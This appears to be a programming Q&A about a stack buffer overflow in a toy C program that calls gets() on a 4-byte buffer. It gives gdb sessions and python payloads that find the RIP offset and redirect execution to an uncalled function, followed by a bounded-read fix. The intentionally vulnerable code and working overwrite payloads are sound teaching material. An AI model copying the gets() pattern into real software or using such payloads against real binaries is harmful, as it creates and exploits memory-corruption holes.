ROP failed on Linux even when ASLR and stack compiler protector are disabled
I turned off ASLR and turned off the gcc stack protector.
And I wrote vulnerable C code and tried to overflow the buffer, so I checked how many characters are needed for the crash. And I tried to change the return address to another function, but I got a message:
Segmentation fault (core dumped)
This is my C code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Target function: main never calls it, so it only runs if the return address is overwritten */
void sss()
{
    printf("good by");
}

void scriptpy(){
    printf("hello world\n");
}

int main(int argc , char** argv)
{
    char buf[4];    /* 4-byte stack buffer */
    gets(buf);      /* unbounded read: this is the overflow the question relies on */
    return 0;
}
I found the address of the "sss" function and I tried to insert the hex value.
This is my address:
(gdb) disas sss
Dump of assembler code for function sss:
0x00000000000006ca <+0>: push %rbp
To edit the return address I insert:
printf "AAAABBBBB/xe2/x06/x00/x00/x00/x00/x00/x00" | ./cTutorial
Let's suppose that the binary is compiled with the flag -fno-stack-protector and ASLR is disabled with echo 0 | sudo tee /proc/sys/kernel/randomize_va_space.
The program starts crashing with a payload of 12 characters:
$ python3 -c "print('A' * 12)" | ./cTutorial
Segmentation fault (core dumped)
Using GDB to find the offset that overwrites RIP, we can see that the first byte of RIP is overwritten with 0x41 ('A') by a payload of 13 characters:
$ gdb -q cTutorial
Reading symbols from cTutorial...
(No debugging symbols found in cTutorial)
(gdb) r <<<$(python3 -c "print('A' * 13)")
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7de0041 in ?? () from /lib/x86_64-linux-gnu/libc.so.6
Note that RIP is overwritten with 0041, where 00 is the null character terminating the string.
To control all bytes of RIP:
(gdb) r <<<$(python3 -c "print('A' * 18)")
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
Let's suppose that the function sss is located at the address 0x0000555555555189.
The final payload is:
(gdb) b sss
(gdb) r <<<$(python3 -c "print('A' * 11 + '\x89\x51\x55\x55\x55\x55')")
breakpoint 1, 0x0000555555555189 in sss ()
Where 11 = 18 - (len('\x89\x51\x55\x55\x55\x55') + 1), the +1 being for the null byte.
The jump to the function sss is taken. The program will crash after the jump to the function sss as the stack will be corrupted.
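The overflow above is only possible because main() reads an unbounded line into a 4-byte buffer with gets(). As an added example (my own code, not part of the question or the answer), here is the bounded replacement a fixed version of main() would use; read_line_bounded, demo_bounded_read and the fmemopen-based test helper are names I chose for this illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Bounded replacement for the gets(buf) call in the question's main():
 * stores at most cap-1 bytes plus the terminator, strips the trailing
 * newline, and drains the rest of an over-long line so it can neither
 * spill into the saved RBP/RIP nor confuse the next read.
 * Returns the number of bytes stored, or -1 on EOF with nothing read. */
int read_line_bounded(char *dst, size_t cap, FILE *in)
{
    if (cap == 0) return -1;
    if (fgets(dst, (int)cap, in) == NULL) {
        dst[0] = '\0';
        return -1;
    }
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[--n] = '\0';            /* complete line: drop the newline */
    } else if (n == cap - 1) {
        int c;                      /* line longer than buffer: discard the rest */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)n;
}

/* Demo helper (my own): feeds a constructed input string through an
 * in-memory stream (POSIX fmemopen) into the same 4-byte buffer the
 * question uses. Returns the stored length if the buffer equals
 * `expected`, otherwise -1. */
int demo_bounded_read(const char *input, const char *expected)
{
    char buf[4];
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL) return -2;
    int n = read_line_bounded(buf, sizeof buf, f);
    fclose(f);
    return strcmp(buf, expected) == 0 ? n : -1;
}

int main(void)
{
    char buf[4];
    /* The answer's 18-character payload now yields just "AAA": the bytes
     * beyond the buffer never reach the saved return address. */
    if (read_line_bounded(buf, sizeof buf, stdin) >= 0)
        printf("stored \"%s\"\n", buf);
    return 0;
}
```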